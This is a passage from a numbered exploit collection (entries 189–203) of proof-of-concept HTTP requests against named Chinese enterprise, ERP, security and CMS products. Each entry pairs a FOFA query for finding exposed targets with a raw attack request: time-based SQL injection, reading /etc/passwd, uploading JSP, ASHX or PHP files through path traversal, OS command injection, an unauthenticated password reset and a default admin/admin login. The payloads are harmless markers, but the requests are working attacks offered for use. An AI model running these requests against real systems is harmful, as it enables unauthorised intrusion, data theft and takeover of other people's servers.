Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. Lanwon (蓝网科技) Clinical Viewing System deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short Video Matrix Marketing System (短视频矩阵营销系统) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. ESAFENET (亿赛通) Electronic Document Security Management System NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. Futong Tianxia (富通天下) Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. Hillstone (山石网科) Yunjian Security Management System setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. Feiqi Hulian (飞企互联) FE Enterprise Operations Management Platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
Request /servlet/uploadAttachmentServlet; if it returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. Volans (飞鱼星) Internet Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. Henan Fengsu Technology (风速科技) Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. Zheda Ente (浙大恩特) Customer Resource Management System Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. Aliyundrive (阿里云盘) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit system assetsmanager_upload endpoint file upload
FOFA:title="Authenticate Please!"

1. Run the POC to obtain the CSRF token, then obtain the cookie, then upload the file and access it to get the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get the cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. Founder (方正) Omnimedia News Editing System binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. WeEngine (微擎) system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.3
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. Redsea Cloud (红海云) eHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--